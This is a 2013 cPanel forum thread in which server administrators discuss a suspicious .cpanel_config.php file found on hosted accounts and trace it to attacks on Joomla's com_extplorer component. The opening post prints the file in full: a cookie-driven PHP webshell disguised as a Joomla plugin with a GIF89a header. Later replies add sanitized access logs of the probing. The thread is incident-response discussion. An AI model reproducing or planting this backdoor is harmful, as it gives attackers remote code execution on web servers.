File on some accounts with suspicious code .cpanel_config.php

speckados

speckados

Well-Known Member
May 21, 2003
332
2
168
Els Ibarsos :: Comunitat Valenciana :: España
cPanel Access Level
DataCenter Provider
Twitter
This night (00:00 to 05:00 GMT +1 at 18/12/2013) on some servers, and some accounts, a suspicious file named .cpanel_config.php on webroot

content of file (i don't undestand)

Code: 
GIF89a
<?php
/**
 * @package     Joomla.Plugin
 * @subpackage  system.instantsuggest
 *
 * @copyright   Copyright (C) 2013 InstantSuggest.com. All rights reserved.
 * @license     GNU General Public License version 2 or later
 */
/**
 * Instant Suggest Ajax
 *
 * @package     Joomla.Plugin
 * @subpackage  system.instantsuggest
 * @since       3.1
 */
class PlgSystemInstantSuggest
{
	public function __construct() {
		$filter = @$_COOKIE['p3'];
		if ($filter) {
			$option = $filter(@$_COOKIE['p2']);
			$auth = $filter(@$_COOKIE['p1']);
			$option("/123/e",$auth,123);
			die();
		}
	}
}
Somebody can explain about the code?
 
I

Infopro

Well-Known Member
May 20, 2003
17,113
507
613
Pennsylvania
cPanel Access Level
Root Administrator
Twitter
That's where that plugin originally came from, I suspect. Or some version of it. You might download that version from the reputable site, wordpress.org at that link provided and check its files against the files on your server. You might also ask your users where this file was found, if they installed this plugin.

If you suspect a security issue here and not sure what to do next, you might want to hire a professional to assist you with that. The cPanel AppCat should be helpful in locating someone:
cPanel App Catalog

That file, where ever it came from, is clearly not a cPanel file, or issue. My linking you to some place where you might find out more Info, should have been enough to assist you in the right direction.

The rest of my suggestions here should already be a known thing, I think.


I am interested to know why you'd post here on this forum about this though.
 
Q

quietFinn

Well-Known Member
Feb 4, 2006
1,076
32
178
Finland
cPanel Access Level
Root Administrator
I have seen that file uploaded in many accounts in out servers.

CXS (ConfigServer eXploit Scanner) detects and quarantines it.

Seems that Joomla's extplorer component is used, but I have no idea how...

As "first aid" I have password protected Joomla's administrator folder in those accounts.
 
M

mtindor

Well-Known Member
Sep 14, 2004
1,361
64
178
inside a catfish
cPanel Access Level
Root Administrator
I concur with quietFinn... com_extplorer appears to be the target. I too have seen these attempts intercepted on many machines.

Code: 
10.20.30.40 - - [18/Dec/2013:23:10:50 -0500] "GET /administrator/components//com_extplorer/ HTTP/1.1" 301 266 "-"
10.20.30.40 - - [18/Dec/2013:23:10:51 -0500] "GET /administrator/components/com_extplorer/ HTTP/1.1" 302 - "-"
10.20.30.40 - - [18/Dec/2013:23:10:51 -0500] "GET / HTTP/1.1" 200 69941 "-"
10.20.30.40 - - [18/Dec/2013:23:10:52 -0500] "POST / HTTP/1.1" 200 69619 "http://somedomain.ext/administrator/components//com_extplorer/"
10.20.30.40 - - [18/Dec/2013:23:10:54 -0500] "POST / HTTP/1.1" 404 - "http://somedomain.ext/administrator/components//com_extplorer/"
10.20.30.40 - - [18/Dec/2013:23:10:50 -0500] "GET /administrator/components//com_extplorer/ HTTP/1.1" 301 266 "-"
10.20.30.40 - - [18/Dec/2013:23:10:51 -0500] "GET /administrator/components/com_extplorer/ HTTP/1.1" 302 - "-"
10.20.30.40 - - [18/Dec/2013:23:10:51 -0500] "GET / HTTP/1.1" 200 69941 "-"
10.20.30.40 - - [18/Dec/2013:23:10:52 -0500] "POST / HTTP/1.1" 200 69619 "http://somedomain.ext/administrator/components//com_extplorer/"
10.20.30.40 - - [18/Dec/2013:23:10:54 -0500] "POST / HTTP/1.1" 404 - "http://somedomain.ext/administrator/components//com_extplorer/"

10.20.30.40 - - [18/Dec/2013:15:54:44 -0500] "GET /administrator/components//com_extplorer/ HTTP/1.1" 200 1128 "-"
10.20.30.40 - - [18/Dec/2013:15:54:45 -0500] "POST /administrator/components//com_extplorer/ HTTP/1.1" 404 - "http://someotherdomain.ext/administrator/components//com_extplorer/"
10.20.30.40 - - [18/Dec/2013:15:54:45 -0500] "POST /administrator/components//com_extplorer/ HTTP/1.1" 404 - "http://someotherdomain.ext/administrator/components//com_extplorer/"
10.20.30.40 - - [18/Dec/2013:15:54:44 -0500] "GET /administrator/components//com_extplorer/ HTTP/1.1" 200 1128 "-"
10.20.30.40 - - [18/Dec/2013:15:54:45 -0500] "POST /administrator/components//com_extplorer/ HTTP/1.1" 404 - "http://someotherdomain.ext/administrator/components//com_extplorer/"
10.20.30.40 - - [18/Dec/2013:15:54:45 -0500] "POST /administrator/components//com_extplorer/ HTTP/1.1" 404 - "http://someotherdomain.ext/administrator/components//com_extplorer/"
Given the GIF89a at the top, I suspect they are attempting to upload it to the server as a gif [because com_extplorer probably doesn't allow files with .php extensions to be uploaded] and then renaming it once it is on the server should they get that far.

And yeah, I heavily massaged that log exerpt.

M
 
You must log in or register to reply here.
Thread starter Similar threads Forum Replies Date
S SOLVED How to restrict all accounts to the global php.ini file. Security 4
M File and folder permissions for several accounts are constantly changing Security 1
M Comodoca File in accounts Security 12
T Server got hacked: All php files from all accounts deleted Security 6
M Best practices for preventing and monitoring spammers or hacked files in user accounts Security 1
Similar threads
SOLVED How to restrict all accounts to the global php.ini file.
File and folder permissions for several accounts are constantly changing
Comodoca File in accounts
Server got hacked: All php files from all accounts deleted
Best practices for preventing and monitoring spammers or hacked files in user accounts
Top Bottom